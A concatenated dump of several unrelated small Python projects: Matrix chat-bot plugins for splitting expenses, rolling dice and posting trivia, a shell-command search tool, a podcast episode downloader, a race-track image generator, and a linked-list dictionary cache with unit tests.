plugin.add_command(
"cashup-register",
register,
"Resets existing room DB and initializes all group members for sharing expenses.",
power_level=100,
)
plugin.add_command(
"cashup-add-expense",
add_expense_for_user,
"Adds a new expense for the given user-name.",
)
plugin.add_command("cashup-print", print_room_state, "debug print function")
plugin.add_command(
"cashup",
cash_up,
"Settle all recorded expenses among the previously registered group.",
power_level=50,
)
plugin.add_command("cashup-ae", add_expense_for_user, "Short form for `cashup-add-expense`")
plugin.add_command("cashup-p", print_room_state, "Short form for `cashup-print`")
# TODO shorter - smartphone friendly naming
"""Defining a configuration values to be expected in the plugin's configuration file and reading the value
Defines a currency_sign used for a nice output message
"""
plugin.add_config("currency_sign", "€", is_required=True)
def clean_print_currency(value):
clean_currency: str = "{:.2f}".format(value)
config_currency_sign: str = plugin.read_config("currency_sign")
clean_currency += config_currency_sign
return clean_currency
class GroupPayments:
def __init__(self, splits_evenly: bool = False):
"""Setup Group_payments instance
Represents a group of people that want to share expenses.
payments is an array of dict in the format
that Cash_up class consumes
each dict contains:
* uid - user name
* expenses - the sum of all expenses spend
* [percentage] - optionally the percentage of the over
over all cost this person is going to pay
Args:
splits_evenly (bool)
defines if the group splits all expenses
envenly or every member pays a certain
percantage of the over all cost
"""
self.payments = []
self.splits_evenly = splits_evenly
def append_new_member(self, new_uid: str, new_percentage: float = None):
"""Adds a new member to this group
throws ValueError when percentage value is demanded but not given.
Args:
new_uid (str): the new user name to be added
[new_percentage] (float): optional the percentage this person is going to pay"""
new_member = {}
if self.splits_evenly == False:
# group is defined as not spliting evenly
if new_percentage is not None:
# and a percentage value is given
new_member = {
"uid": new_uid,
"percentage": new_percentage,
"expenses": 0,
}
else:
# percentage value is demanded but not given
error_msg = "cashup Group_payments append_new_member failed: members percentage is not defined for a group that does not split evenly"
logger.error(error_msg)
raise ValueError(error_msg, new_member)
else:
# group splits expenses evenly
new_member = {"uid": new_uid, "expenses": 0}
# store new member in groups list
self.payments.append(new_member)
def reset_all_expenses(self):
"""Sets all expenses to 0 for every group member.
Attention all previously captured expeneses are lost!!!"""
for payment in self.payments:
payment["expenses"] = 0
def increase_expense(self, search_uid, new_expense: float):
"""Increases the current expenses of user with name search_uid
by the given new_expense
Args:
search_uid (str): user name whos expenses will be increased
new_expense (float): the new expense that will be added
"""
# find all payments where uid matches
payment_to_increase = list(filter(lambda payment: payment["uid"] == search_uid, self.payments))
# update first and hopefully only match
# throws IndexError when search_uid not found
payment_to_increase[0]["expenses"] += new_expense
def __str__(self):
"""Simple function to get a human readable string of this groups state"""
group_str: str = f"**Group**: splits_evenly: {self.splits_evenly}, \n"
for payment in self.payments:
name = payment["uid"]
expense = payment["expenses"]
group_str += f"{name} spend {clean_print_currency(expense)}"
if self.splits_evenly == False:
percentage = payment["percentage"] * 100
group_str += f" and will pay {percentage}% of the over all cost \n"
else:
group_str += f" \n"
return group_str
class PersistentGroups:
"""Setup Persistent_groups instance
Simple wrapper for persisting groups in some kind of data base
Args:
store
The object used to interact with the database
"""
def __init__(self, store):
self.store = store
async def delete_group(self, search_room_id: str):
# delete group if exists
return await self.store.clear_data(search_room_id)
async def load_group(self, search_room_id: str):
return await self.store.read_data(search_room_id)
async def save_group(self, room_id: str, group_to_save: GroupPayments):
return await self.store.store_data(room_id, group_to_save)
pg = PersistentGroups(plugin)
class Cashup:
def __init__(self, group: GroupPayments):
"""Setup Cash_up algorithm
For a set of people who owe each other some money or none
this algorithm can settle expense among this group.
Optionally it can be specified how much percentage of
the over all expenses should be paid by each person.
If not specified the expenses are distributed equally.
Args:
group (Group_payments): Object representing a groups
expenses and how they want to split these
"""
self._split_uneven = not group.splits_evenly
self._payments = group.payments
def distribute_expenses(self):
"""distribute the given expenses within the group
and return who owes who texts
returns: (array of str)
Text elements per payment to
settle expense among the group."""
self._calculate_sum_and_mean_group_expenses()
self._calculate_parts_to_pay()
return self._who_owes_who()
def _calculate_sum_and_mean_group_expenses(self):
"""calculate the sum & mean of all expenses in the group"""
self._sum_group_expenses = functools.reduce(lambda acc, curr: acc + int(curr["expenses"]), self._payments, 0)
self._mean_group_expenses = self._sum_group_expenses / len(self._payments)
def _calculate_parts_to_pay(self):
"""calculate the parts each person has to pay
depending on _split_uneven or not"""
if self._split_uneven:
self._parts_to_pay = [
{
"uid": payment["uid"],
"has_to_pay": (payment["expenses"] - (self._sum_group_expenses * payment["percentage"])),
}
for payment in self._payments
]
else:
self._parts_to_pay = [
{
"uid": payment["uid"],
"has_to_pay": (payment["expenses"] - (self._mean_group_expenses)),
}
for payment in self._payments
]
def _who_owes_who(self):
"""Build strings of who owes who how much.
Source is the JavaScript version found at:
https://stackoverflow.com/questions/974922/algorithm-to-share-settle-expenses-among-a-group
returns:
output_texts: (array of str)
Text elements per payment to
settle expense among the group."""
# some function
ordered_parts_to_pay = sorted(self._parts_to_pay, key=lambda d: d["has_to_pay"])
sortedPeople = [part["uid"] for part in ordered_parts_to_pay]
sortedValuesPaid = [part["has_to_pay"] for part in ordered_parts_to_pay]
i = 0
j = len(sortedPeople) - 1
debt = 0
output_texts = []
while i < j:
debt = min(-(sortedValuesPaid[i]), sortedValuesPaid[j])
sortedValuesPaid[i] += debt
sortedValuesPaid[j] -= debt
# generate output string
if debt != 0.0:
new_text = str(sortedPeople[i]) + " owes " + str(sortedPeople[j]) + " " + clean_print_currency(debt)
output_texts.append(new_text)
if sortedValuesPaid[i] == 0:
i += 1
if sortedValuesPaid[j] == 0:
j -= 1
return output_texts
async def register(command):
"""Register a set of people as a new group to share expenses"""
response_input_error = (
f"You need to register at least two users: \n"
"`cashup-register <user-name1> [<user1-percentage>]; <user-name2> [<user2-percentage>]; ...` [optional] \n"
"examples: \n"
"`cashup-register A 0.2; B 0.8;` A pays 20%, B pays 80% or `cashup-register A; B;` to split expenses evenly"
)
# if there is a group registered for this room already
# run a cashup so old data will be shown to the users
# before deleting it
previously_persisted_group: GroupPayments = await pg.load_group(command.room.room_id)
if previously_persisted_group is not None:
await plugin.respond_notice(
command,
"There is already a group registered for this room. " "I will do a quick cashup so no data will be lost when registering the new group.",
)
await cash_up(command)
if command.args:
logger.debug(f"cashup-register called with {command.args}")
# cashup-register called with ['Marius', '0,7;', 'Andrea', '0.3;']
# cashup-register called with ['Marius;', 'Andrea;']
# generate lists of names and optional percentages
new_names = []
new_percentages = []
for arg in command.args:
# remove all ; from arg element;
arg = arg.replace(";", "")
# find any numbers in string (eg: 12; 12,1; 12.1)
match_arg_nr = re.search("\d*[.,]?\d+", arg)
# returns a match object
if match_arg_nr:
# number (as string) found
# replace "," of german numbers by a "." decimal point
# convert the number to a real float number
arg_float = float(match_arg_nr.group().replace(",", "."))
if len(new_percentages) == (len(new_names) - 1):
new_percentages.append(arg_float)
else:
await plugin.respond_notice(command, response_input_error)
return
else:
new_names.append(arg)
if len(new_names) == len(new_percentages) and len(new_names) > 1:
# every name got a percentage value
new_group_not_even = GroupPayments(splits_evenly=False)
for idx, name in enumerate(new_names):
# create a new group member with split percentage
new_group_not_even.append_new_member(name, new_percentages[idx])
# persist new group for current room id
await pg.save_group(command.room.room_id, new_group_not_even)
elif len(new_percentages) == 0 and len(new_names) > 1:
# no name got a percentage value
new_group_even = GroupPayments(splits_evenly=True)
for name in new_names:
# create a new group member without split percentage (split expenses equally)
new_group_even.append_new_member(name)
# persist new group for current room id
await pg.save_group(command.room.room_id, new_group_even)
else:
# sth went terribly wrong
await plugin.respond_notice(command, response_input_error)
return
else:
# no command args defined
await plugin.respond_notice(command, response_input_error)
return
response_success = "Successfully registered a new group:"
await plugin.respond_message(command, response_success)
await print_room_state(command)
async def print_room_state(command):
"""Read the database for the group registered for the current room [debugging helper function]"""
loaded_group: GroupPayments = await pg.load_group(command.room.room_id)
response = "No group registered for this room!"
if loaded_group is not None:
response = loaded_group.__str__()
await plugin.respond_message(command, response)
else:
await plugin.respond_message(command, "No data to read!")
async def add_expense_for_user(command):
"""Adds a new expense for the given username"""
response_input_error = (
"You need to provide a previously registered user-name and expense value: \n" "`cashup-add-expense <user-name> <expense-value>[€/$] [optional]`"
)
match_expense_nr: Match
user_name: str = ""
if len(command.args) == 1:
match_expense_nr = re.search("\d*[.,]?\d+", command.args[0])
if match_expense_nr:
# user seems to have a expense number defined
# maybe the user wants to increase for himself
# check if display_name of user is registered in the group
mxid: str = command.event.sender
user_name = command.room.user_name(mxid)
# user_link: str = await plugin.link_user(command.client, command.room.room_id, display_name)
# await plugin.respond_message(command, f"Command received from {display_name} ({mxid}). Userlink: {user_link}")
elif len(command.args) == 2:
# first command arg is <user-name>
user_name = command.args[0]
# second command arg is <expense-value>
# clean up expense-value from additional currency signs etc
# find any number in string (eg: 12; 12,1; 12.1)
match_expense_nr = re.search("\d*[.,]?\d+", command.args[1])
else:
# command should only contain <user-name> and <expense-value>
await plugin.respond_notice(command, response_input_error)
return
if match_expense_nr:
# extract match, then replace "," of german numbers by a "." decimal point
expense_float = float(match_expense_nr.group().replace(",", "."))
try:
# Persistent_groups.load_group throws AttributeError when group not found
loaded_group: GroupPayments = await pg.load_group(command.room.room_id)
# Group.increase_expense throws IndexError when user_name not found
loaded_group.increase_expense(user_name, expense_float)
except (AttributeError, IndexError) as e:
await plugin.respond_notice(command, response_input_error)
return
await pg.save_group(command.room.room_id, loaded_group)
await plugin.respond_message(
command,
f"Successfully added {clean_print_currency(expense_float)} expense for {user_name}!",
)
else:
await plugin.respond_notice(command, response_input_error)
async def cash_up(command):
"""Settle all registered expenses among the previously registered group."""
try:
loaded_group: GroupPayments = await pg.load_group(command.room.room_id)
except AttributeError:
response_error = "No cashup possible because there was no group registered for this room."
await plugin.respond_notice(command, response_error)
return
cash_up = Cashup(loaded_group)
message: str = ""
who_owes_who_texts = cash_up.distribute_expenses()
# check if any payments should be done
if len(who_owes_who_texts) > 0:
message += f"**Result of group cashup**: \n"
for line in who_owes_who_texts:
message += f"{line} \n"
await plugin.respond_message(command, message)
else:
await plugin.respond_notice(command, "No balancing of expenses needed.")
loaded_group.reset_all_expenses()
await pg.save_group(command.room.room_id, loaded_group)
setup()
```
#### File: plugins/echo/echo.py
```python
from core.plugin import Plugin
plugin = Plugin("echo", "General", "A very simple Echo plugin")
def setup():
plugin.add_command("echo", echo, "make someone agree with you for once")
async def echo(command):
"""Echo back the command's arguments"""
response = " ".join(command.args)
await plugin.respond_message(command, response)
setup()
```
#### File: plugins/roll/roll.py
```python
__description__ = "Roll one or more dice. The trigger is 'roll'."
__version__ = "1.1"
__author__ = "Dingo"
from core.plugin import Plugin
import random
async def roll(command):
if not command.args:
await plugin.respond_notice(command, "No argument given.")
return None
try:
number, rest = command.args[0].lower().split("d", 1)
if number.strip() == "":
number = 1
else:
number = abs(int(number.strip()))
if rest.strip().startswith("0"):
lowest_value = 0
else:
lowest_value = 1
if "+" in rest:
sides, modifier = rest.split("+", 1)
if sides.strip() == "":
sides = 6
else:
sides = abs(int(sides.strip()))
modifier = int(modifier.strip())
elif "-" in rest:
sides, modifier = rest.split("-", 1)
if sides.strip() == "":
sides = 6
else:
sides = abs(int(sides.strip()))
modifier = -int(modifier.strip())
else:
if rest.strip() == "":
sides = 6
else:
sides = abs(int(rest.strip()))
modifier = 0
except ValueError:
await plugin.respond_notice(command, "Malformed argument! Use 1d6, 3d10 etc.")
return None
if number == 0 or sides == 0:
await plugin.respond_notice(
command,
"Number of dice or sides per die are zero! Please use only nonzero numbers.",
)
return None
random.seed()
roll_list = []
if number > 100000:
await plugin.respond_notice(
command,
"Number of dice too large! Try a more reasonable number. (5 digits are fine)",
)
return None
for _ in range(number):
roll_list.append(random.randint(lowest_value, sides))
if len(roll_list) > 50:
result_list = " <detailed list too large>"
else:
result_list = " (" + " + ".join([str(x) for x in roll_list]) + ")"
if len(result_list) > 200:
result_list = " <detailed list too large>"
if len(roll_list) == 1:
result_list = ""
await plugin.respond_message(
command,
"**Result:** " + str(sum(roll_list) + modifier) + result_list,
delay=200,
)
plugin = Plugin("roll", "General", "Plugin to provide a simple, randomized !roll of dice")
plugin.add_command("roll", roll, "the dice giveth and the dice taketh away")
```
#### File: plugins/wissen/wissen.py
```python
import logging
import random
import os.path
from core.bot_commands import Command
from core.plugin import Plugin
logger = logging.getLogger(__name__)
plugin = Plugin("wissen", "Fun", "Post a random or specific entry of the database of useless knowledge.")
def setup():
"""
This just moves the initial setup-commands to the top for better readability
:return: -
"""
plugin.add_command("wissen", wissen, "Post a random or specific entry of the database of useless knowledge.")
async def wissen(command: Command):
"""
Post a random or specific entry of the database of useless knowledge
:param command:
:return:
"""
with open(os.path.join(os.path.dirname(__file__), "wissen.txt")) as wissendb:
wissen = wissendb.readlines()
wissenanzahl = len(wissen)
if len(command.args) == 1 and str(command.args[0]).isdigit():
handle: int = command.args[0]
elif len(command.args) == 0:
handle: int = 0
else:
await plugin.respond_notice(command, "Usage: `wissen [index]`")
return
try:
wissenindex = int(handle)
if wissenindex < 1 or wissenindex > wissenanzahl:
raise IndexError
chosen = wissen[wissenindex - 1]
except (ValueError, IndexError):
chosen = random.choice(wissen)
wissenindex = wissen.index(chosen) + 1
ausgabe = "%s (%s/%s)" % (chosen.strip(), wissenindex, wissenanzahl)
await plugin.respond_notice(command, ausgabe)
setup()
``` |
{
"source": "jimmyppi/searchcmd",
"score": 3
} |
#### File: searchcmd/searchcmd/commands.py
```python
from operator import itemgetter
from collections import Counter
from pygments import highlight
from pygments.lexers import BashLexer
from pygments.formatters import TerminalFormatter
LEXER = BashLexer()
FORMATTER = TerminalFormatter()
class Command(object):
def __init__(self, cmd, line, idx, doc):
self.cmd = cmd
self.name = cmd.split()[0]
self.lines = [line]
self.idxs = [idx]
self.docs = [doc]
self.domains = Counter({doc.url.domain: 1})
def to_dict(self):
return {'cmd': self.cmd,
'lines': self.lines,
'idxs': self.idxs,
'docs': self.docs}
@classmethod
def from_dict(cls, d):
cmd = d['cmd']
merged = None
for line, idx, doc in zip(d['lines'], d['idxs'], d['docs']):
inst = cls(cmd, line, idx, doc)
if merged is None:
merged = inst
else:
merged.add_duplicate(inst)
return merged
def __eq__(self, cmd):
# TODO: More advanced comparison
return self.cmd == cmd.cmd
def add_duplicate(self, cmd):
self.lines.extend(cmd.lines)
self.idxs.extend(cmd.idxs)
self.docs.extend(cmd.docs)
self.domains.update(cmd.domains)
def echo(self, verbose=False):
"""
Example output:
cmd --flag (fromdomain.com, otherdomain.com)
Include urls to all sources if verbose:
cmd --flag (fromdomain.com)
http://fromdomain.com/full/path
...
"""
cmd = highlight(self.cmd, LEXER, FORMATTER).strip()
domains = u'({})'.format(
u', '.join(d for d,_ in self.domains.most_common(2)))
s = u'{}\t{}'.format(cmd, domains)
if verbose:
s += u'\n {}'.format(
u'\n'.join([u'\t{}'.format(doc.url.url) for doc in self.docs]))
return s
def score(self, nr_docs):
nr_docs = float(nr_docs)
score = 0.0
for line, doc in zip(self.lines, self.docs):
score += (doc.nr_lines/(doc.nr_lines + line)) * \
(nr_docs/(nr_docs + doc.idx))
return score
def __repr__(self):
return '<cmd {}>'.format(self.cmd.encode('utf-8'))
class Commands(object):
def __init__(self, commands=None, nr_docs=0):
self.commands = commands or {}
self.nr_docs = nr_docs
def add_command(self, cmd):
if cmd.cmd in self.commands:
self.commands[cmd.cmd].add_duplicate(cmd)
else:
self.commands[cmd.cmd] = cmd
def rank_commands(self, nr=5):
cmds = [(cmd.score(self.nr_docs), cmd)
for cmd in self]
cmds.sort(key=itemgetter(0), reverse=True)
return [cmd for _, cmd in cmds[:nr]]
def __iter__(self):
for command in self.commands.values():
yield command
def to_dict(self):
return {'commands': self.commands,
'nr_docs': self.nr_docs}
@classmethod
def from_dict(cls, d):
return cls(d['commands'], d['nr_docs'])
```
#### File: searchcmd/searchcmd/download.py
```python
import re
import sys
try:
from urllib.parse import urlparse
except ImportError:
from urlparse import urlparse
from concurrent.futures import as_completed
from requests.packages import urllib3
from requests_futures.sessions import FuturesSession
from lxml.html import fromstring, tostring
try:
from lxml.html import soupparser
except ImportError:
soupparser = None
import tld
urllib3.disable_warnings()
def get(request):
session = FuturesSession(max_workers=1)
future = next(as_completed([session.get(
request.url, headers=request.headers, timeout=request.timeout)]))
if future.exception() is not None:
return DownloadError(request, future.exception())
else:
resp = future.result()
return HtmlDocument(resp.url, resp.content)
def iter_get(requests, verbose=True):
if isinstance(requests, Request):
requests = [requests]
session = FuturesSession(max_workers=10)
futures_to_req = dict(
(session.get(req.url, headers=req.headers, timeout=req.timeout),
(req, i)) for i, req in enumerate(requests))
for future in as_completed(futures_to_req):
if future.exception() is not None:
req, idx = futures_to_req[future]
if verbose:
sys.stdout.writelines(u'x')
sys.stdout.flush()
yield DownloadError(req, future.exception(), idx)
else:
resp = future.result()
_, idx = futures_to_req[future]
if verbose:
sys.stdout.writelines(u'.')
sys.stdout.flush()
yield HtmlDocument(resp.url, resp.content, idx)
if verbose:
sys.stdout.writelines(u'\n')
class DownloadError(object):
def __init__(self, request, err, idx=None):
self.request = request
self.idx = idx
self.err = err
self.status_code = None
if hasattr(err, 'status_code'):
self.status_code = err.status_code
class Request(object):
def __init__(self, url, headers=None, timeout=None):
self.url = url
self.headers = headers
self.timeout = timeout or 3.03
class HtmlDocument(object):
def __init__(self, url, body, idx=None, nr_lines=None):
self.url = Url(url)
self.body = body
self.nr_lines = nr_lines
if self.nr_lines is None:
self.nr_lines = float(len(body.split(b'\n')))
self.idx = idx
self._tree = None
@property
def tree(self):
if self._tree is not None:
return self._tree
try:
self._tree = fromstring(self.body, base_url=self.url.url)
_ = tostring(self._tree, encoding='unicode')
except:
try:
self._tree = soupparser.fromstring(self.body)
except:
pass
return self._tree
def to_dict(self):
return {'url': self.url.url,
'nr_lines': self.nr_lines,
'idx': self.idx}
@classmethod
def from_dict(cls, d):
return cls(d['url'], b'', d['idx'], d['nr_lines'])
class Url(object):
def __init__(self, url):
self.url = url
self.domain = re.sub('^www.', '', urlparse(self.url).netloc)
self.base_domain = tld.get_tld(self.url)
``` |
{
"source": "jimmy-print/DynamicJRE",
"score": 3
} |
#### File: DynamicJRE/dynamicjre/get_episode.py
```python
import os
import requests
from bs4 import BeautifulSoup
REGULAR = "regular"
MMA = "mma"
FIGHT = "fight"
episode_types = (REGULAR, MMA, FIGHT)
url_formats = (
"http://traffic.libsyn.com/joeroganexp/p{}.mp3",
"http://traffic.libsyn.com/joeroganexp/mmashow{}.mp3",
)
# Fight episodes aren't supported yet
alt_regular_url_format = "http://traffic.libsyn.com/joeroganexp/p{}a.mp3"
# Sometimes the url for regular episodes has an 'a' after the
# url number. I have no idea why.
episode_type_url_format = dict(zip(episode_types, url_formats))
def download(episode_number, episode_type, guest, headers=None):
"""Calls requests.get to do the actual downloading"""
try:
print(f"Downloading episode {episode_type} {episode_number} {guest}")
download_link = (
episode_type_url_format[episode_type].format(episode_number))
raw_episode = requests.get(download_link, headers=headers)
if not raw_episode.ok:
download_link = alt_regular_url_format.format(episode_number)
print("Trying alternative url format...")
raw_episode = requests.get(download_link, headers=headers)
# If the response is the 404 html
if raw_episode.headers['content-type'] == 'text/html; charset=UTF-8':
print('Episode {} was not found.'.format(episode_number))
except KeyboardInterrupt:
return
# Use context manager here?
try:
with open(f"p{episode_number}.mp3", "wb") as f:
print("Writing to mp3")
f.write(raw_episode.content)
except KeyboardInterrupt:
cleanup(episode_number)
def with_episode_number(episode_number, headers=None):
"""Downloads the specified regular episode"""
# guest is an empty string because I haven't implemented searching
# with ep. numbers
download(episode_number, REGULAR, guest="", headers=headers)
def get_latest_episode_attributes():
"""Returns latest episode number and type (Regular, MMA, Fight)"""
homepage = "http://podcasts.joerogan.net/"
response = requests.get(homepage)
soup = BeautifulSoup(response.text, "lxml")
latest_element = soup.find_all("div", attrs={"class": "episode odd"})[0]
episode_number_element = latest_element.find("span", attrs={"class": "episode-num"})
episode_number = episode_number_element.text.strip("#")
title_element = latest_element.find("a", attrs={"class": "ajax-permalink"})
title_text = title_element.get("data-title")
if "mma show" in title_text.lower():
episode_type = MMA
elif "fight companion" in title_text.lower():
episode_type = FIGHT
else:
episode_type = REGULAR
guest = latest_element.find("a", attrs={"data-section": "podcasts"}).get("data-title")
return episode_number, episode_type, guest
def latest(headers=None):
"""Downloads the latest episode"""
try:
episode_number, episode_type, guest = get_latest_episode_attributes()
except KeyboardInterrupt:
return
download(episode_number, episode_type, guest, headers=headers)
return episode_number, episode_type, guest # For testing purposes
def cleanup(episode_number):
"""Deletes the downloaded episode"""
print("Commencing cleanup")
os.remove(f"p{episode_number}.mp3")
print("Cleanup complete. Exiting.")
```
#### File: DynamicJRE/tests/test_get_episode.py
```python
import unittest
import os
from dynamicjre import get_episode
headers = {
"Range": "bytes=0-100"
}
number = 1000
def make_test_request(self):
get_episode.download(
number, get_episode.REGULAR, "",
headers=headers)
class TestSaveFolder(unittest.TestCase):
def tearDown(self):
get_episode.cleanup(number)
def test_save_folder(self):
make_test_request(self)
self.assertTrue(os.path.isfile(f"p{number}.mp3"))
class TestNoSaveFolder(unittest.TestCase):
def tearDown(self):
get_episode.cleanup(number)
def test_no_save_folder(self):
make_test_request(self)
self.assertTrue(os.path.isfile(f"p{number}.mp3"))
class TestCleanup(unittest.TestCase):
def test_cleanup(self):
make_test_request(self)
get_episode.cleanup(number)
self.assertFalse(os.path.isfile(f"/p{number}.mp3"))
class TestGetLatestEp(unittest.TestCase):
def test_get_latest_ep_attrs(self):
episode_num, episode_type, __ = get_episode.get_latest_episode_attributes()
int(episode_num)
self.assertTrue(episode_type, get_episode.episode_types)
def test_get_latest_ep(self):
episode_num_alt, __, __ = get_episode.latest(headers=headers)
get_episode.cleanup(episode_num_alt)
if __name__ == "__main__":
unittest.main()
``` |
{
"source": "jimmyprior/RaceCar",
"score": 3
} |
#### File: jimmyprior/RaceCar/race.py
```python
import math
import random
from PIL import Image, ImageDraw, ImageFont
circumference = 1250
radius = circumference / (2 * math.pi)
diameter = radius * 2
im_width = int(diameter * 2.2)
im_height = int(diameter * 2.2)
im_center_x = im_width / 2
im_center_y = im_height / 2
track_center_x = im_width / 2
track_center_y = im_height / 2
tank_color = (255, 0, 0) #tank and gas number g%
track_color = (0, 0, 255) #dist and track d%
def get_random_percents(number):
"""
retruns a list of n random percents that will sum to 100
"""
tanks = []
total = 0
for _ in range(number):
num = random.randint(1, 10)
total += num
tanks.append(num)
percents = []
for tank in tanks:
percents.append(math.floor(100 * tank / total))
dif = 100 - sum(percents)
if dif != 0:
percents[random.randint(0, len(percents)-1)] += dif
return percents
def get_points(theta, hypotenuse):
x = math.cos(theta) * hypotenuse
y = math.sin(theta) * hypotenuse
return (x, y)
def draw_gas_can(img, center_x, center_y, radius):
img.ellipse(
[(center_x - radius, center_y - radius),
(center_x + radius, center_y + radius)],
fill=(255, 0, 0)
)
def generate_track(qty_tanks):
"""
qty_tanks : the number of thanks to be put randomly on the track
"""
image = Image.new("RGB", (im_width, im_height), (255, 255, 255))
draw = ImageDraw.Draw(image, "RGB")
draw.ellipse(
[(im_center_x - radius, im_center_y - radius), (im_center_x + radius, im_center_y + radius)],
outline = (0, 0, 0),
width = 6
)
distances = get_random_percents(qty_tanks)
gas_amounts = get_random_percents(qty_tanks)
circ = 0
font = ImageFont.truetype("arial.ttf", 30)
for index, dist, gas in zip(range(1, qty_tanks+1), distances, gas_amounts):
#hypotenuse = radius
index = qty_tanks - index
gas_angle = ((circ + dist) / 100) * (2 * math.pi)
gas_x, gas_y = get_points(gas_angle, radius)
gas_label_x, gas_label_y = get_points(gas_angle, radius + 50)
dist_angle = ((circ + dist / 2) / 100) * (2 * math.pi)
dist_x, dist_y = get_points(dist_angle, radius)
dist_label_x, dist_label_y = get_points(dist_angle, radius + 100)
draw_gas_can(draw, gas_x + track_center_x, gas_y + track_center_y, 6)
gas_label = [gas_label_x + track_center_x, gas_label_y + track_center_y]
gas_tank = (gas_x + track_center_x, gas_y + track_center_y)
draw.line([gas_tank, tuple(gas_label)], fill=tank_color) #draw the tank line
dist_label = [dist_label_x + track_center_x, dist_label_y + track_center_y]
dist_start = (dist_x + track_center_x, dist_y + track_center_y)
draw.line([dist_start, tuple(dist_label)], fill=track_color) #draw the dist line
circ += dist
if gas_label[0] < track_center_x:
gas_label[0] -= font.getsize(f"g{index}={gas}%")[0]
if dist_label[0] < track_center_x:
dist_label[0] -= font.getsize(f"g{index}={dist}%")[0]
draw.text(tuple(gas_label), f"g{index}={gas}%", fill=(100, 0, 0), font=font) #draw gas percentage
draw.text(tuple(dist_label), f"d{index}={dist}%", fill=(0, 0, 100), font=font) #previous circ + dist / 2
return image
largest = 12
smallest = 2
#generate_track(5).show()
for i in range(10):
generate_track(random.randint(smallest, largest)).save(f"tracks/track-{i}.png")
``` |
{
"source": "jimmyqtran/IntermediateSoftwareDesignPython",
"score": 3
} |
#### File: IntermediateSoftwareDesignPython/Project 8 - Local Dictionary/LocalDictionary.py
```python
from datalist import *
from enum import Enum
import json
class DictionaryEntry:
def __init__(self, word, part_of_speech, definition, example=None):
self.word = word
self.part_of_speech = part_of_speech
self.definition = definition
self.example = example
def __str__(self):
return f"Word : {self.word} \n" \
f"Part of speech: {self.part_of_speech} \n" \
f"Definition : {self.definition} \n" \
f"Example : {self.example}"
class LocalDictionary:
def __init__(self, dictionary_json_name="dictionary.json"):
self.dictionary = {}
filename = dictionary_json_name
with open(filename) as json_file:
data = json.load(json_file, object_hook=self.my_decoder)
for entry in data:
self.dictionary[entry.word] = entry
@staticmethod
def my_decoder(thingy):
if "entries" in thingy:
mega_list = []
d = thingy["entries"]
for entry in d:
a = DictionaryEntry(entry["word"], entry["part_of_speech"], entry["definition"])
if "example" in entry:
a.example = entry["example"]
mega_list.append(a)
return mega_list
return thingy
def search(self, word):
if word not in self.dictionary:
raise KeyError("The word is not in the dictionary.")
return self.dictionary[word]
def __str__(self):
print()
class DictionaryEntryCache(DataList):
def __init__(self, capacity=10):
super().__init__()
if capacity < 1:
raise ValueError("There must be at least a capacity of one")
self.capacity = capacity
def add(self, entry):
if not isinstance(entry, DictionaryEntry):
raise TypeError("The entry should be of type Dictionary Entry")
count = 0
self.reset_current()
while self.current is not None:
self.iterate()
count += 1
self.reset_current()
if count >= self.capacity:
for _ in range(self.capacity - 1):
self.iterate()
self.current.next = None
self.add_to_head(entry)
def search(self, word):
self.reset_current()
while True:
node = self.iterate()
if not node:
raise KeyError("Word not in here")
elif node.data.word == word:
temp = node.data
self.remove(node.data)
self.add(temp)
self.reset_current()
return self.head.next
class DictionarySource(Enum):
LOCAL = 0
CACHE = 1
class Dictionary:
def __init__(self):
self.local = LocalDictionary()
self.cache = DictionaryEntryCache()
def search(self, word):
try:
return self.cache.search(word), DictionarySource.CACHE
except:
if word not in self.local.dictionary:
raise KeyError("Word is not in here")
self.cache.add(self.local.dictionary[word])
return self.local.search(word), DictionarySource.LOCAL
if __name__ == '__main__':
big_dict = Dictionary()
while True:
try:
wordy = input("Enter a word to lookup: ")
actual_entry = big_dict.search(wordy)
print(actual_entry[0])
print(f"(Found in {actual_entry[1].name})")
except KeyError as e:
print(f"{e}: {wordy}")
continue
```
#### File: IntermediateSoftwareDesignPython/Project 8 - Local Dictionary/LocalDictionaryUnitTest.py
```python
import itertools
import json
import unittest
from LocalDictionary import *
class DictionaryEntryTestCase(unittest.TestCase):
pass
class LocalDictionaryTestCase(unittest.TestCase):
def testLocalDictionary(self):
local_dict = LocalDictionary()
self.assertIsInstance(local_dict, LocalDictionary)
def testSearch(self):
local_dict = LocalDictionary()
self.assertIsInstance(local_dict.search("fly"), DictionaryEntry)
self.assertEqual(local_dict.search("fly").word, "fly")
self.assertEqual(local_dict.search("fly").part_of_speech, "verb")
self.assertEqual(local_dict.search("python").word, "python")
self.assertEqual(local_dict.search("python").example, None)
self.assertEqual(local_dict.search("jolly").definition, "full of high spirits")
self.assertRaises(KeyError, lambda: local_dict.search("potato"))
class DictionaryEntryCacheTestCase(unittest.TestCase):
def testAdd(self):
local_dict = LocalDictionary()
#instantiate a DictionaryEntryCache of capacity 3
cache = DictionaryEntryCache(capacity=3)
cache.add(local_dict.search("fly"))
self.assertEqual(cache.head.next.data.word, "fly")
self.assertEqual(cache.head.next.next, None)
cache.add(local_dict.search("foothill"))
self.assertEqual(cache.head.next.data.word, "foothill")
self.assertEqual(cache.head.next.next.data.word, "fly")
self.assertEqual(cache.head.next.next.next, None)
cache.add(local_dict.search("python"))
self.assertEqual(cache.head.next.data.word, "python")
self.assertEqual(cache.head.next.next.data.word, "foothill")
self.assertEqual(cache.head.next.next.next.data.word, "fly")
self.assertEqual(cache.head.next.next.next.next, None)
cache.add(local_dict.search("jolly"))
self.assertEqual(cache.head.next.data.word, "jolly")
self.assertEqual(cache.head.next.next.data.word, "python")
self.assertEqual(cache.head.next.next.next.data.word, "foothill")
self.assertEqual(cache.head.next.next.next.next, None)
def testSearch(self):
# search when the word already exists in the cache
local_dict = LocalDictionary()
cache = DictionaryEntryCache(capacity=3)
cache.add(local_dict.search("python"))
cache.add(local_dict.search("foothill"))
cache.add(local_dict.search("jolly"))
cache.search("foothill")
self.assertEqual(cache.head.next.data.word, "foothill")
self.assertEqual(cache.head.next.next.data.word, "jolly")
self.assertEqual(cache.head.next.next.next.data.word, "python")
self.assertEqual(cache.head.next.next.next.next, None)
# search when the word does not exist in the cache
self.assertRaises(KeyError, lambda: cache.search("potato"))
# search when the word is already in the cache but it's the only word
cache2 = DictionaryEntryCache(capacity=3)
cache2.add(local_dict.search("foothill"))
cache2.search("foothill")
self.assertEqual(cache2.head.next.data.word, "foothill")
class DictionaryTestCase(unittest.TestCase):
def testDictionary(self):
big_dict = Dictionary()
wow = big_dict.search("foothill")
self.assertEqual(wow[0].word, "foothill")
self.assertEqual(wow[1], DictionarySource.LOCAL)
